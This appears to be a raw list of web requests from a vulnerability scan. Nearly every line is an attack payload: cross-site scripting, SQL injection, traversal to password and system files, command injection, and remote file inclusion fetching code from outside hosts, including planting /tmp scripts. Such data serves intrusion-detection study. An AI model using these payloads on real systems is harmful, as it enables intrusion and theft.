\n/scripts/onwkbtts3uj1.php3\n/javascript/htpasswd.doc\n/en-us/account/plog-download.php?dl_type=album&checked[]=' union select 'plogger_checked_sql_injection.nasl',0,0,0,0,0,0,0,0,0,0,0,0,0,0 -- \n/javascript/ia.exe\n/javascript/review.exe\n/if69ddo1.cfm?<script>document.cookie=\"testiabz=5220;\"</script>\n/javascript/sections.exe\n/1r8cfrlf.mscgi?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/javascript/java.exe\n/examples/jsp/jsp2/el/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/review.php?id=1&cat=&subcat=\"><script>alert('phpmydirectory_multiple_xss.nasl');</script>\n/h5sc3gxy.php?<script>cross_site_scripting.nasl</script>\n/postscript_fm/\n/main.php?logout=\"rm q21367835&rem \n/script_path/pgvnuke/pgvindex.php?document_root/header.php=@rfiurl\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 1174127559--\n/3j8echh0.aspx?<script>document.cookie=\"testfuqi=4189;\"</script>\n/javascript/atom.exe\n/javascript/~jessica.exe\n/h5i6crm3.pl?<script>document.cookie=\"testlihk=7070;\"</script>\n/iv5vkgam.pl?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/?<script>document.cookie=\"testnvxc=4301;\"</script>\n/examples/jsp/jsp2/el/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/h4bi26jd.jsp?<script>document.cookie=\"testhrzx=1150;\"</script>\n/examples/jsp/sessions/webplus.exe?script=webplus_install_path.nasl\n/javascript/us.exe\n/scripts/api/orders.json?search[instance_eval]=kernel.fail `ipconfig /all`\n/j4oqyvga.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.as\n/scripts/man-cgi?-p id ls\n/javascript/keys.exe\n/javascript/patches.exe\n/v3axg1p8.jspa?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/examples/jsp/num/index.php?string='\n/javascript/cisco.exe\n/ows-bin/htimage.exe/path/filename?2,2\n/ygkjkngd.x?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/cgi-sys/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/help.php?q=';del\\x09q84185561\\x09#\n/.../.../.../.../.../.../.../.../.../.../etc/passwd\n/cacti/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/dslpwt15.aspx?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/q703m78q.mscgi?<script>document.cookie=\"testvowq=604;\"</script>\n/82q7ywa8.exe?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/d5a5renl.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/b4vng02k.dll?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/recordings/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/main.php?stuff=&ver\\x0c>q94866398&rem\\x0c\n/help.php?q=&ver >q37428189&rem \n/zv8tv7h8.jsp?<script>document.cookie=\"testcqwz=9752;\"</script>\n/recordings/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/webcgi/sensepost.exe?/c+dir\n/scripts/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/examples/jsp/error/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/shopadmin.asp?password=abc&username=\\\"><script>alert(foo)</script>\n/g8nu2yy7.idc?<script>cross_site_scripting.nasl</script>\n/ewc3rz1l.fts?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/eei78ore.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/aspscripter/\n/javascript/staff.exe\n/scripts/6gl21a1hiz3s.php\n/j734qobz.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n////./../.../boot.ini\n<script>document.cookie=\"testhrzx=1150;\"</script>\n/examples/servlets/servlet/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/javascript/adodb.exe\n/cgi-914/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/en-us/7o5qp766.kspx?<script>cross_site_scripting.nasl</script>\n/manager/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/cacti/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/recordings/popup.php?include_path=/etc/passwd\\x00\n/scgi-bin/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/l752x1ry.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"|ping -w 10000 -n 1 1.2.3.4|rem \n/webcgi/ion-p.exe?page=c:\\winnt\\repair\\sam\n/javascript/banners.exe\n/examples/jsp/checkbox/detail.asp?nchannel='1\n/bl8sefdm.php3?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"|sleep\\x0910\\x09#\n/zuihld5m.mscgi?<script>cross_site_scripting.nasl</script>\n/qb2xy9aw.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/frznctvhi0i5??&cmd=id\n/javascript/tele.exe\n/phpmyadmin/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/cgi-915/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/cgi-bin//_vti_bin/fpcount.exe?page=default.htm|image=3|digits=15\n/main.php?stuff=uname >q52464141 #\n/odzk29aa.x?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/examples/jsp/jsp2/el/forumdisplay.php?fid=21\"><script>x</script>\n/node/view/666\\\"><script>alert(document.domain)</script>\n/azcrfs8d.kspx?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/en-us/33y9gcqq.htm?<script>document.cookie=\"testnvxc=4301;\"</script>\n/examples/jsp/error/htmlscript?../../../../../../../../../etc/passwd\n/7u1pb2xi.nsf?<script>document.cookie=\"testlwwz=718;\"</script>\n/if69ddo1.asp?<script>document.cookie=\"testiabz=5220;\"</script>\n/recordings/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\\x00\n/admin/index.php?path_to_script=http://cirt.net/rfiinc.txt??&cmd=ls\n/en-us/account/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/fmnveedu.nsf?<script>document.cookie=\"testgfbr=7014;\"</script>\n/cgi.cgi/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/will-o'brien/\n/cgi-win/query?mss=../config\n/entrylevelmedicaltranscription/\n/javascript/purchases.exe\n/index.php?news7[\"functions\"]=http://192.168.202.96:8080/txenjrxf3?\n/main.php?logout=\\\\'\n/phpmyadmin/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/en-us/account/wiki.php/<script>foo</script>\n/_vti_bin/shtml.exe/junk_nonexistant.exe\n/cvslog.cgi?file=<script>window.alert</script>\n//..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c/windows/win.ini\n/examples/jsp/sessions/direct.php?rf=/etc/passwd\\x00\n/replymsg.php?send=1&destin=<script>alert('vulnerable')</script>\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331923200\n/azcrfs8d.x?<script>document.cookie=\"testjpdr=9205;\"</script>\n/scripts_sms/\n/lsoix5h3.nsf?<script>cross_site_scripting.nasl</script>\n/beef/js/scriptaculous.js\n/igtf0zon.php3?<script>cross_site_scripting.nasl</script>\n/zv8tv7h8.x?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/javascript/recovery.exe\n/eg2u8pbv.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ny1b3qq4.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/certificates.exe\n/tukodz3j.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=&del;q39916466&rem;\n/6dlc2zm9.html?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/examples/servlets/servlet/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/yef5f3d5.nsf?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/top.php?stuff=\"ver,>q55729425&rem,\n/xlj7h65o.php?<script>document.cookie=\"testtbbe=856;\"</script>\n/rbec2ohx.jspa?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"ping,-w,7000,-n,1,1.2.3.4|rem,\n/javascript/apache.exe\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+22+6a+ff+ff+d0+89+ec+61+52+51+68+75+70+00+00+68+74+61+72+74+68+57+53+41+53++>>ctdn\n/cgi-bin/remindpasswd\n/xscript/\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0367\\0322\\0041\\03201\\0311qqj\\0042j\\0007pq\\0211\\0343\" >> /tmp/xmefwyizyj0;echo|awstats983561.txt\n/gy23xnjq.do?<script>cross_site_scripting.nasl</script>\n/scripts/webdriver\n/examples/jsp/sessions/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/xsqln7eb.jsp?<meta http-equiv=set-cookie content=\"testpcbb=9254\">\n/hjdzm96v.nsf?<script>document.cookie=\"testbyqe=7474;\"</script>\n/examples/jsp/jsp2/jspx/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/javascript/em.exe\n/ddoworrl.x?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/cgi-bin/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/inscripta-rib/\n/zroo33l4.cfc?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/en-us/account/admin/admin.php?sid='\n/scripts/2sfdqydfaknx.shtml\n/opensiteadmin/scripts/classes/filters/singlefilter.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\\x00\n/zmvq66jy.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"ver,>q74451345&rem,\n/webcgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/top.php?stuff=\"|ping\\x09-w\\x097000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/en-us/i686v90l.dll?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/javascript/lst.exe\n/xfkun1ku.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/story.pl?next=../../../../../etc/passwd\\x00\n/main.php?stuff=\"\\x0drm\\x09q27469451\\x09#\n/l4fz1dqw.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/gvx7m5ti.aspx?<script>document.cookie=\"testwldz=3506;\"</script>\n/javascript/qpid.exe\n/top.php?stuff=\";del q17551646 #\n/miz4r5hz.jspa?<meta http-equiv=set-cookie content=\"testviqu=1270\">\n/help.php?q=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/iajtej82.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd|\n/javascript/htpasswd.dump\n/o6ebbirj.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/oa.exe\n/stallard-acsac'03/\n/h4bi26jd.jspa?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/scripts/index.php?p=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\\x00\n/8t9v8k7x.jsp?<script>document.cookie=\"testhvje=9403;\"</script>\n/login.php?lang=/../../../../../../../../../../../../etc/passwd\\x00\n/scripts/search.jsp?q=%\"<script>alert(1331905049)</script>\n/confirmunsubscription.php?output=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/top.php?stuff=\";uname\\x09>q82281214\\x09#\n/javascript/htpasswd.phtml\n/javascript/environment.exe\n/en-us/esmozg5d.cgi?<script>cross_site_scripting.nasl</script>\n/h21y8w52.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/1qwv2p5p.cfc?<meta http-equiv=set-cookie content=\"testvqcy=252\">\n/8x6w469u.asp?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/main.php?logout=\"\\x0duname >q69325217 #\n/top.php?stuff='uname\\x09>q68811991\\x09#\n/rdf.exe\n/82q7ywa8.do?<script>document.cookie=\"testpwew=1315;\"</script>\n/recordings/pfdispaly?../../../../../../etc/passwd\n/82q7ywa8.pl?<script>document.cookie=\"testpwew=1315;\"</script>\n/1r8cfrlf.do?<script>document.cookie=\"testydan=5106;\"</script>\n/cgi-bin/index.php?p=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\\x00\n/ju0u7kfo.htm?<script>cross_site_scripting.nasl</script>\n/javascript/torrents.exe\n/i2n4v4rl.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/frznctvhi0i5?\\x00\n/javascript/wap.exe\n/main.php?stuff=\"|ping\\x09-w\\x0911000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/javascript/preserve.exe\n/javascript/test-env.exe\n/phpmyadmin/index2.php?_server[]=&_server[remote_addr]='.system('id').exit().'&option=wrapper&module[module]=1\n/zroo33l4.aspx?<script>document.cookie=\"testiklc=904;\"</script>\n/help.php?q=\\x0duname\\x09>q84752771\\x09#\n/bmeun223.jspa?<meta http-equiv=set-cookie content=\"testhhwu=7044\">\n/examples/jsp/checkbox/starnet/addons/slideshow_full.php?album_name='1495073341\n/admbrowse.php?down=1&amp;cur=/etc/&amp;dest=passwd&amp;rid=1&amp;s=[someid]\n/vhzmaia2.pl?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/top.php?stuff=\"&ver\\x0c>q55426988&rem\\x0c\n/htbin/c32web.exe/changeadminpassword\n/l4fz1dqw.cfc?<script>cross_site_scripting.nasl</script>\n/javascript/disclaimer.exe\n/script_mar05/\n/help.php?q=\"\\x0auname\\x09>q43182957\\x09#\n/subscriptionwizard/\n/opensiteadmin/scripts/classes/filter.php?path=@rfiurl\\x00\n/main.php?stuff='uname\\x09>q85216432\\x09#\n/scripts/.cobalt/siteusermod/siteusermod.cgi\n/examples/jsp/cal/webplus?script=/../../../../etc/passwd\n/javascript/04.exe\n/sphera/login/sm_login_screen.php?uid=\\\"><script>alert('vulnerable')</script>\n/preview.php?php_script_path=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=dir\n/scripts/search.php?searchstring=<script>foo</script>\n/scripts/rx9ysf2iwv4j.html\n/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file&currentfolder=/dqoamjxrgv.jsp\\x00\n/cgi-bin/test2.pl?&lt;script&gt;alert('vulnerable');&lt;/script&gt;\n/top.php?stuff='\\x0drm\\x09q88128927\\x09#\n/odzk29aa.cfc?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/help.php?q=&ping;-w;7000;-n;1;1.2.3.4&rem;\n/help.php?q=|ping;-w;7000;-n;1;1.2.3.4|rem;\n/../../../../../../../../../../boot.ini\n/cacti/quickstore.cgi?page=../../../../../../../../../../etc/passwd\\x00html&cart_id=\n/examples/jsp/checkboxsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/examples/jsp/jsp2/jspx/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/edzaia0i.cfc?<script>cross_site_scripting.nasl</script>\n/scripts_genericform/\n/recordings/story.pl?next=../../../../../etc/passwd\\x00\n/0w155a7c.x?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\"&ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/examples/jsp/sessions/check_user_id.php?user_id=<script>foo</script>\n/help.php?q=\"del;q24461998&rem;\n/main.php?stuff='\\x0adel q75819271 #\n/javascript/order.exe\n/pc_mag_digital_subscription_-_1_yr/\n/javascript/declarations.exe\n/cacti/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331909400,244455451 -- \n/path_script/createurl.php?formurl=http://192.168.202.118:8080/2aibfaczmac8?\n/scripts/tomcat_proxy_directory_traversal.nasl1331904241\n/javascript/grants.exe\n/nmw0do67.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7o5qp766.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\";rm\\x09q82281214\\x09#\n/uvazfs7p.fts?<script>document.cookie=\"testwtbo=4831;\"</script>\n/fnwhrxyd.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.ora\n/main.php?stuff=\"&ping;-w;8000;-n;1;4.3.2.1&rem;\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='1485593337\n/cgi-bin/input.bat?|dir ..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/tvzjwzrsfg0+>+/dev/null+&').\"]=1\n/cgis/query?mss=../config\n/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=\n/scripts/wpnbr.dll\n/top.php?stuff=;uname\\x09>q62254247\\x09#\n/7o5qp766.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/vhzmaia2.asp?<script>document.cookie=\"testkogj=3979;\"</script>\n/protection.php?action=logout&siteurl=../../../../../../../../../../boot.ini\\x00\n/examples/jsp/cal/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/odzk29aa.mscgi?<script>document.cookie=\"testtfvh=2141;\"</script>\n/news.php?config[script_path]=http://192.168.202.118:8080/2aibfaczmac8??\n/scripts/admin.php?zfaction=config\n/users/scripts/submit.cgi\n/edv3mapy.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/what's_new/\n/examples/servlets/servlet/catalog.php?action=category_show&id='\n/scgi-bin/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\\x00.html\n/scs86g1p.idc?<script>document.cookie=\"testquyx=2820;\"</script>\n/3j8echh0.php?<script>document.cookie=\"testfuqi=4189;\"</script>\n<script>document.cookie=\"testxqrn=4654;\"</script>\n/scripts/samples/search/queryhit.idq\n/vac1l5vm.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/7o5qp766.cfc?<script>cross_site_scripting.nasl</script>\n/subscriptions.save\n/main.php?logout=\"del\\xa0q51679818&rem\\xa0\n/examples/jsp/error/cal_week.php?op=week&catview=999'\n/yef5f3d5.php?<script>document.cookie=\"testcrcv=6167;\"</script>\n/h5sc3gxy.fts?<script>cross_site_scripting.nasl</script>\n/v3axg1p8.x?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/lsoix5h3.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&del\\x09q52362944\\x09#\n/include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/zz5thkvtmlgl?\n/main.php?logout=uname >q63335376 #\n/7o5qp766.mscgi?<script>cross_site_scripting.nasl</script>\n/i7prbs22.php3?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,077396515632,4,5,6,7,8,9,10,11--\n/javascript/yt.exe\n/examples/jsp/colors/webadmin.php?show=/etc/passwd\n/phpmyadmin/scripts\n<script>document.cookie=\"testchuc=2100;\"</script>\n/bn857frh.jspa?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/javascript.php?abs_path=/etc/passwd\\x00\n/7dbjwpw6.exe?<script>cross_site_scripting.nasl</script>\n/zuihld5m.x?<script>cross_site_scripting.nasl</script>\n/scs86g1p.asp?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/main.php?stuff=&uname >q43247564 #\n/examples/servlets/servlet/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331904457','5'--\n/bn857frh.nsf?<script>cross_site_scripting.nasl</script>\n/yef5f3d5.cgi?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/phpmyadmin/documentation.html?phpmyadmin=../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd\n/p043snfr.idc?<script>cross_site_scripting.nasl</script>\n/jscript.php?my_ms[root]=@rfiurl?my_ms[root]=@rfiurl?\n/cgi-bin/cmd1.exe?/c+dir\n/scripts/login/default.aspx\n/examples/jsp/error/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/examples/jsp/checkbox/index.php?include_files[]=&include_files[query_string]=/etc/passwd\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\\x00\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331918976&lang_crm=../../vtigerservice.php\\x00\n/thvgjebp.exe\n/quick_scripts/\n/bzuf9ozq.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/l752x1ry.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0duname\\x09>q76412123\\x09#\n/ygkjkngd.do?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/main.php?stuff=';sleep\\x098\\x09#\n/examples/jsp/colors/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/copatranscript_20061030/\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/4dckqcc0acprbz?\n/backend/classes.php?include_path=../lib/jinzora.js\\x00\n/chonlpritranscript/\n/faxsurvey?cat /etc/passwd\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/etfvyyifyy.sh'); function v\n/examples/servlets/servlet/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; \n/ext_scripts/\n/enscript/\n/teens o'poppin/\n/javascript/wrap.exe\n/subscriptions/\n/cgi-local/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/index.php?skin=<script>alert(414705599131)</script>\n/pxagj7n7.jsp?<script>cross_site_scripting.nasl</script>\n/removal_tool.exe/\n/newtopic.php?forumid='</a><iframe src=javascript:alert(%27xss%27)></iframe>\n/help.php?q=\"ping\\x0c-w\\x0c11000\\x0c-n\\x0c1\\x0c1.2.3.4|rem\\x0c\n/forum1_professionnel.asp?n=1771&amp;nn=100&amp;page=/.../.../.../.../.../.../boot.ini\n/javascript/random.exe\n/qczkquis.dll?<script>document.cookie=\"testkwlg=5591;\"</script>\n/hydrocodone-prescription/\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904220&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\nmultihtml.pl?multi=/etc/passwd\\x00html\n/qhvu0pdg.x?<script>document.cookie=\"testchuc=2100;\"</script>\n/javascript/w3c.exe\n/cacti/newsscript.pl?mode=admin\n/etc/passwd\n/examples/servlets/servlet/htmlscript?../../../../../../../../../etc/passwd\n/7dbjwpw6.fts?<script>cross_site_scripting.nasl</script>\n/en-us/fo564rei.pl?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0asleep\\x098\\x09#\n/d7ktpmcq.kspx?<script>cross_site_scripting.nasl</script>\n/cacti/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/help.php?q=\"&ver\\x0c>q33739327&rem\\x0c\n/zmvq66jy.php?<script>cross_site_scripting.nasl</script>\n/examples/jsp/colors/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/examples/jsp/checkbox/view_user.php?list=1&letter=&sort_by='select\n/..\\..\\..\\..\\..\\..\\/winnt/win.ini\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/no4ghqiguzhst?\n/recordings/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/l752x1ry.html?<script>cross_site_scripting.nasl</script>\n/javascript/apac.exe\n/examples/jsp/error/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/static//../../../../../../../../windows/win.ini\\x00en\n/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.96:8080/4dckqcc0acprbz?\n/apavxugx.htm?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/help.php?q=\"ping\\x0b-w\\x0b10000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/debug/errorinfo?title===<script>alert('vulnerable');</script>\n/scripts/goto.asp\n/examples/jsp/sessions/base_qry_common.php?base_path=/etc/passwd\\x00\n/en-us/i686v90l.php3?<script>document.cookie=\"testfutf=1550;\"</script>\n/javascript/document.ora\n/scripts/shop.plx/page=nessus114465198\n/scripts/ui/login?user=nessus-1331908727\n/pascal's_wager/\n/jnv890lt.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-win/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/javascript/leader.exe\n/xsqln7eb.asp?<script>document.cookie=\"testpcbb=9254;\"</script>\n/cgi-bin/showcheckins.cgi?person=<script>alert('vulnerable')</script>\n/report.php?scriptpath=http://192.168.202.118:8080/ghl9il??\n/en-us/account/listrec.pl?app=qmh-news&template=;ls /etc|\n/towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/ghl9il?\n/examples/jsp/checkbox/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/en-us/7o5qp766.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/cgi-home.exe\n/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/fo564rei.html?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/documentation.html?phpmyadmin=<!--#exec cmd=\"dir\"-->\n/cgi-bin/mrtg.cgi?cfg=../../../../../../../../etc/passwd\n/en-us/n9xlumt5.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-sys/powerup/r.cgi?file=../../../../../../../../../../etc/passwd\n/b4vng02k.aspx?<script>document.cookie=\"testtrlh=3672;\"</script>\n/examples/jsp/jsp2/jspx/shopaddtocart.asp?productid='42\n/169okeyj.cgi?<script>document.cookie=\"testxeoi=3573;\"</script>\n/b1q8bywu.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h21y8w52.jsp?<script>cross_site_scripting.nasl</script>\n/d5a5renl.cfc?<script>cross_site_scripting.nasl</script>\n/nsn/..\\util/del.bas\n/javascript/other.exe\n/comments.php?scriptpath=http://192.168.202.118:8080/iroy1gvqrrqu??\n/javascript/baskets.exe\n/examples/servlets/servlet/wiki.php/<script>foo</script>\n/examples/jsp/checkbox/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/examples/jsp/cal/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/jnt3f86c.cfm?<script>document.cookie=\"testcmax=9270;\"</script>\n/scripts/apgafvcxoeeh.asp\n/?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/9o6g5vkn.idc?<script>cross_site_scripting.nasl</script>\n/cgi-bin/index.php?op=default&date=200607' union select 1,1068432583,1,1,1,1,1,1,1,1--&blogid=1\n/gvx7m5ti.php3?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/examples/jsp/jsp2/jspx/index.php?page=/etc/passwd\\x00\n/top.php?stuff=\"ping\\x0c-w\\x0c7000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/quagynka.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=&ver,>q36343182&rem,\n/javascript/printers.exe\n/javascript/sh.exe\n/main.php?logout=\"rm,q59646442&rem,\n/cacti/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/index.php/1'\n/newsscripts/\n/ygkjkngd.asp?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/l752x1ry.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/en-us/s7qus4g3.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/htgrep/file=index.html&hdr=/etc/passwd\n/hipkz026.nsf?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/cgi-bin/..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc..\\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/cacti/mylog.html?screen=/etc/passwd\n/examples/jsp/checkbox/index.php?op=default&date=200607' union select 1,1975764141,1,1,1,1,1,1,1,1--&blogid=1\n/en-us/account/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/speedscript-thm/\n/moneylinespecialoffersdescriptionfinal1/\n/perscription-cialis/\n/scripts/vzdybnanqpc3.sh\n/javascript/htpasswd.xls\n/main.php?stuff=\"ping\\xa0-w\\xa010000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/0z575z74.idc?<meta http-equiv=set-cookie 